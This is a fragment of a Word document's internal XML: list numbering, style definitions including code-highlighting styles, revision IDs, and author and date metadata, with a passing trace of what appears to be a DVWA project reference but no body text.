    <w:tmpl w:val="47C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B357C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="115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62554"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="853A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11E23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2D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844B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDCE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D011C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65CC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2705E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A9A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C551D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23D8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360C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A45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4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="14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58"/>
    <w:rsid w:val="000810ED"/>
    <w:rsid w:val="00224558"/>
    <w:rsid w:val="002A3500"/>
    <w:rsid w:val="002A6FC0"/>
    <w:rsid w:val="006347A1"/>
    <w:rsid w:val="006A1861"/>
    <w:rsid w:val="00735BE9"/>
    <w:rsid w:val="00791801"/>
    <w:rsid w:val="007D178B"/>
    <w:rsid w:val="008C03B4"/>
    <w:rsid w:val="00A13723"/>
    <w:rsid w:val="00A65B01"/>
    <w:rsid w:val="00AE18C2"/>
    <w:rsid w:val="00B654E5"/>
    <w:rsid w:val="00B93C41"/>
    <w:rsid w:val="00BC4D54"/>
    <w:rsid w:val="00BF7332"/>
    <w:rsid w:val="00C34A93"/>
    <w:rsid w:val="00CB63B1"/>
    <w:rsid w:val="00D1592B"/>
    <w:rsid w:val="00DD1843"/>
    <w:rsid w:val="00DE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73DEE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{498F06EE-5CA5-4CAF-BB1F-1731FA14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45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55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801"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Piedepgina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801"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="002A3500"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A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2A350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A350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3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3500"/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ljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="002A3500"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-property">
    <w:name w:val="hljs-property"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="002A3500"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="002A3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igininja/DVW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807</Words>
  <Characters>4442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Ph.D WALTER MARCELO FUERTES DIAZ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Fuertes Diaz Walter Marcelo</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-16T13:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-16T13:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>